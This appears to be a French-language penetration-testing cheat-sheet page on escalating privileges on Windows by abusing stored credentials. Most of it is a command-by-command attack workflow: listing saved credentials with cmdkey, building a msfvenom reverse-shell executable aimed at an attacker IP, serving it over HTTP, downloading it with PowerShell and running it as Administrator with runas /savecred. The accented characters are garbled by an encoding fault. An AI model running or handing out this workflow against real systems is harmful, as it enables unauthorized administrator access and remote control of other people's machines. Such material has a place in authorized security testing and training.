๐Ÿ”‘Stored Credentials

Microsoft Windows offre une large gamme d'autorisations et de privilรจges prรฉcis pour contrรดler l'accรจs aux composants Windows, notamment les services, les fichiers et les entrรฉes de registre. L'exploitation des informations d' identification stockรฉes est une technique pour augmenter les privilรจges.

Exploitation

Si un attaquant identifie une entrรฉe d'informations d'identification stockรฉe pour un compte administrateur, il peut opter pour une รฉlรฉvation de privilรจges en exรฉcutant un fichier malveillant ร  l'aide de l'utilitaire runas.

Pour รฉnumรฉrer une liste de tous les noms d'utilisateur et informations d'identification stockรฉs, tapez :

>cmdkey /list

Imaginons qu'on trouve ceci:

Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

Crรฉer un exรฉcutable malveillant:

$ msfvenom โ€“p windows/shell_reverse_tcp lhost= <attacker IP> lport= <port d'รฉcoute> โ€“f exe > shel.exe

Puis le mettre dans un serveur http:

$ python โ€“m SimpleHTTPServer 80

Dรฉmarrez un netcat dans un nouveau terminal et transfรฉrez le shell.exe et exรฉcutez-le ร  l'aide de la commande suivante.

# Tรฉlรฉchargement du reverse shell
powershell wget <attacker IP>/shell.exe -o shell.exe

# execution du reverse shell
runas /savecred /user:WORKGROUP\Administrator "C:\Users\<username>\Downloads\shell.exe"

Si tout se passe bien, nous devrions avoir reรงu la session de l'administrateur sur le netcat prรฉcรฉdemment lancรฉ.

Derniรจre mise ร  jour